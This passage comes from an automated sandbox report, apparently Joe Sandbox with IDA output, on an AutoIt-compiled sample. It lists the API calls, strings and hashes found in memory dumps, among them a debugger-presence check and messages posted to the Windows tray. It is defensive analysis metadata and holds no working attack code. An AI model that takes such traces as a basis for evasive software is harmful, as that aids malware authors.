                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen
                                                                                                                  • String ID: 3, 3, 16, 1
                                                                                                                  • API String ID: 176396367-3042988571
                                                                                                                  • Opcode ID: cc05851debe58349b4182dddb791e31f0a6c1b0240d2cfd4ad72ff7ee546f915
                                                                                                                  • Instruction ID: c4614b946a2fd36e784673893305c67727a17569a41a6a3d01665281a5de132c
                                                                                                                  • Opcode Fuzzy Hash: cc05851debe58349b4182dddb791e31f0a6c1b0240d2cfd4ad72ff7ee546f915
                                                                                                                  • Instruction Fuzzy Hash: 3BE02B42254320219231137A9DC197F76C9CFCD750B20186BF996C2366EEA49D9293A0
                                                                                                                  APIs
                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B10B23
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message
                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                  • API String ID: 2030045667-4017498283
APIs
  • Part of subcall function 00ACF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00AD0D71,?,?,?,00AB100A), ref: 00ACF7CE
• IsDebuggerPresent.KERNEL32(?,?,?,00AB100A), ref: 00AD0D75
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AB100A), ref: 00AD0D84
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AD0D7F
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 55579361-631824599
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B4232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B4233F
  • Part of subcall function 00B1E97B: Sleep.KERNEL32 ref: 00B1E9F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B4236C
• PostMessageW.USER32(00000000), ref: 00B42373
  • Part of subcall function 00B1E97B: Sleep.KERNEL32 ref: 00B1E9F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00AEBE93
• GetLastError.KERNEL32 ref: 00AEBEA1
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AEBEFC
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0